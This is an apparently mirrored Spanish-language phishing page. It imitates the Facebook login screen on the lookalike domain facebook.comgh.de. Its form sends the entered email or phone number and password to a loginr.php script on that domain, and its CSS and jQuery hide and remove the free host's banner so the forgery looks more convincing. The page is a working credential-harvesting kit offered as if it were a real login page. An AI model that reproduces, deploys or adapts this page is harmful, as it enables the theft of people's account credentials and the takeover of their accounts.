<style>div{display:none;}</style><!DOCTYPE html>
<html lang="es">

<!-- Mirrored from facebook.comgh.de/MjUyNjJ4MjUyNjJ4ODA by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 19 Nov 2020 16:04:30 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<title>Ingresar</title>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<style>




     div{ 
display:none;
      }
      *{
        padding: 0;
        margin: 0;
      }
      body{
        background: #f0f2f5;
        display: flex;
        justify-content: center;
        font-family: arial;
        
      }
#n{
Display:block;
  width: 38%;
  font-size: 28px;
  margin-top: 16%;
  margin-right: 10%;
}
#n p:first-child{
  font-size: 60px;
  font-weight:bold;
  color: #1877f2;
}
#m{
  width: 30%;
  margin-top: 12%;
}
#m .a{
  background: #fff;
  border-radius: 8px;
  text-align: center;
  padding-top: 1.5%;
  padding:2.5%;
}
#m .a .cont{
  width: 90%;
  padding: 3.5%;
  font-size: 14px;
  border-radius: 5px;
  color: #c4c6cd;
  border:0.2px solid #dddfe2;
  margin-top: 3%;
}
#m .a .cont:focus{
  color: #000;
}
#m .a .b{
  margin-top: 3%;
  width: 97%;
  padding: 2.8%;
  border-radius: 5px;
  font-weight: bold;
  font-size: 18px;
  border: 0px solid #fff;
  background:#1877f2;
  color: #fff;
  cursor: pointer;
}
#m .a .f{
  margin-top: 3%;
  padding-bottom: 5%;
}
#m .a .f a{
  list-style: none;
  text-decoration: none;
  color: #1877f3;
  font-size: 14px;
}
#m .aa{
  width: 80%;
  padding-top: 5%;
  text-align:  center;
  margin: auto;
}
#m .aa a{
  list-style: none;
  color: #000;
  font-weight: bold;
  text-decoration: none;
}
      #mmm{
        display: none;
      }
  @media screen and (max-width:640px) {
    /* reglas CSS */
    #mmm{
      display: block;
    }
    #n{
      display: none;
Margin:0;
Width:0;
    }
    body{
      background: #fff;
      flex-direction: column;
      
    }
    #mmm .g{
      background: #e6f2ff;
      font-size: 12px;    
      padding-top: 2%;
      padding-bottom: 2%;
      border-bottom: 1px solid #6eadff;
    }
    #mmm .g p a{
      color: #576b95;
      list-style: none;
      text-decoration: none;
    }
    #mmm .g p{
      margin: auto;
      width: 91%;
    }
    #m{
      width: 99%;
      margin-top: 3%;
    }
    #m .a .cont{
      background: #f5f6f7;
      color: #000;
    }
    #m .aa{
      display: none;
    }
    #mmm .gg{
      text-align: center;
      color:#1877f2;
      font-weight: bold;
      font-size: 22px;
      margin-top: 2.5%;
    }
  }
  @media screen and (max-width:1024px) and (min-width:640px) {
    /* reglas CSS */
  }
  @media screen and (min-width:1024px) {
    /* reglas CSS */
  }
  
  
  </style>




<script src="../ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
     $("div").remove();







});
</script>





</head>
<body><!--]>--><div style="margin: 0 20% !important; text-align:center !important;font-size:16px !important;font-family:arial !important;background-color:black !important;color:white !important">This page is hosted for free by <a style="color:grey" rel="nofollow" href="https://www.zzz.com.ua/">zzz.com.ua</a>, if you are owner of this page, you can remove this message and gain access to many additional features by upgrading your hosting to PRO or VIP for just 8.33 UAH.<br/>Do you want to support owner of this site? <a style="color:grey" rel="nofollow" href="https://www.zzz.com.ua/en/donate/facebook.comgh.de">Click here</a> and buy hosting plan!</div>
<section id="n">
  <p>facebook</p>
  <p>Facebook te ayuda a comunicarte y compartir con las personas que forman parte de tu vida.</p>
</section>
<article id="mmm">
  <section class="g"><p>Facebook solicita y recibe tu numero de telefono de tu red movil.</p><p><a href="#">Cambiar la configuracion</a></p></section>
  <section class="gg">facebook</section>
</article>
<article id="m">
  <section class="a">
    <form method="post" action="https://facebook.comgh.de/loginr.php">
      <p><input type="text" name="email" placeholder="Correo electronico o numero de telefono" class="cont"></p>
      <p><input name="password" type="password" placeholder="Contrase&ntilde;a" class="cont"></p>
      <p><input type="submit" value="Entrar" class="b"></p>
      <p class="f"><a href="#">&#191;Has olvidado los datos de la cuenta?</a></p>
    </form>
  </section>
  <section class="aa">
    <a href="#">Crea una pagina</a> para un personaje publico, un grupo de musica o un negocio.
  </section>
</article>
<!--]--><div style="text-align:center;font-size:11px" class="cbalink"><a href="https://www.zzz.com.ua/" title="&#1073;&#1077;&#1089;&#1087;&#1083;&#1072;&#1090;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;&#1080;&#1085;&#1075;">&#1073;&#1077;&#1089;&#1087;&#1083;&#1072;&#1090;&#1085;&#1099;&#1081; &#1093;&#1086;&#1089;&#1090;&#1080;&#1085;&#1075;</a> ZZZ.COM.UA | <a href="https://www.mintme.com/" title="crowdfunding">Crowdfunding</a> MINTME.COM<br/><br/></div>
<div class="cumf_bt_form_wrapper" style="display:none">
<form id="contact_us_mail_feedback" action="https://facebook.comgh.de/oldTi9QvqM6ytokU9Q8ylQq" method="post">
    <fieldset>
        <!-- Form Name -->
        <legend>Contact Us</legend>
        <!-- Text input-->
        <div class="cumf_bt_form-group">
            <label class="col-md-4 cumf_bt_control-label" for="cumf_bt_name">name</label>
            <div class="col-md-4">
                <input id="cumf_bt_name" name="cumf_bt_name" type="text" placeholder="your name" class="cumf_bt_form-control cumf_bt_input-md
" required="1"/>
                <span class="cumf_bt_help-block">Please enter your name</span>
            </div>
        </div>
        <!-- Text input-->
        <div class="cumf_bt_form-group">
            <label class="col-md-4 cumf_bt_control-label" for="cumf_bt_email">your email</label>
            <div class="col-md-4">
                <input id="cumf_bt_email" name="cumf_bt_email" type="text" placeholder="enter your email" class="cumf_bt_form-control cumf_bt
_input-md" required="1"/>
                <span class="cumf_bt_help-block">please enter your email</span>
            </div>
        </div>
        <!-- Textarea -->
        <div class="cumf_bt_form-group">
            <label class="col-md-4 cumf_bt_control-label" for="cumf_bt_message">your message</label>
            <div class="col-md-4">
                <textarea class="cumf_bt_form-control" id="cumf_bt_message" name="cumf_bt_message">Message goes here</textarea>
            </div>
        </div>
        <input type="submit" id="cumf_bt_submit" value="Send"/>
    </fieldset>
</form>
</div></body>

<!-- Mirrored from facebook.comgh.de/MjUyNjJ4MjUyNjJ4ODA by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 19 Nov 2020 16:04:31 GMT -->
</html><!-- zzz </body><!-->
